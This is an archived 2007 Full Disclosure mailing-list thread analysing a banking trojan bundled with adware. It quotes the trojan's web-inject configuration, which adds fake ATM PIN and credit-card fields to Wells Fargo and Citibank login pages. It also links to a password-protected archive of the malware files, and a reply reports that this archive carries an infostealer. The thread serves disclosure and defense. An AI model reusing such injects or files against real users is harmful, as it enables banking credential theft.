Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
From: "Net Tech" <net.tech11 () gmail com>
Date: Tue, 13 Mar 2007 13:36:10 -0400

Why is this "genius" sending virus infected attachments to the list?
The Trojan Horse Infostealer.Bancos.Z is attached to his "research data"...
it steals passwords and logs keystrokes entered into certain financial Web
sites.



On 3/12/07, Thierry Zoller <Thierry () zoller lu> wrote:

Dear list,

Whoever deals with these poeple and thinks they are a benign Adware
company (and thus spreads their bundles.

Check this :
Ignoring the fact that they basicaly  install a Rootkit, I attached a
few files I reversed, they install a DLL that does not directly KEYLOG
your
banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking
page
asking you to enter more details (like PIN, Magic Password etc), then
capture that data and transmit it (I did no further investigation)

http://secdev.zoller.lu/system32.zip
Pass: 123

I am disgusted. They even created their own XML parser for this ...

An extract of HTML code they inject :
-------------------------------------
<inject
url="wellsfargo"
before="name=userid autocomplete='off'></DIV>"
what="
<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT
id=pin  tabIndex=2 maxLength=4 type=password size=4 name=pin
autocomplete='off'></SPAN></DIV>
"
block="alt=Go"
check="pin"
quan="4"
content="d"
>
</inject>
------------------------------------

Attached the main files (pass 123), feel free to add this as HIPS or
whatever
signatures, those interested in a complete reversal can contact me
to receive the EXE in question.

I have no more time feel free to dig deeper.


I especialy liked this :
------------------------
<inject
url="citibank.com"
<TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To
prevent fraud enter your credit card information please:</SPAN></TD></TR>


Puke..

--
http://secdev.zoller.lu
Thierry Zoller

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]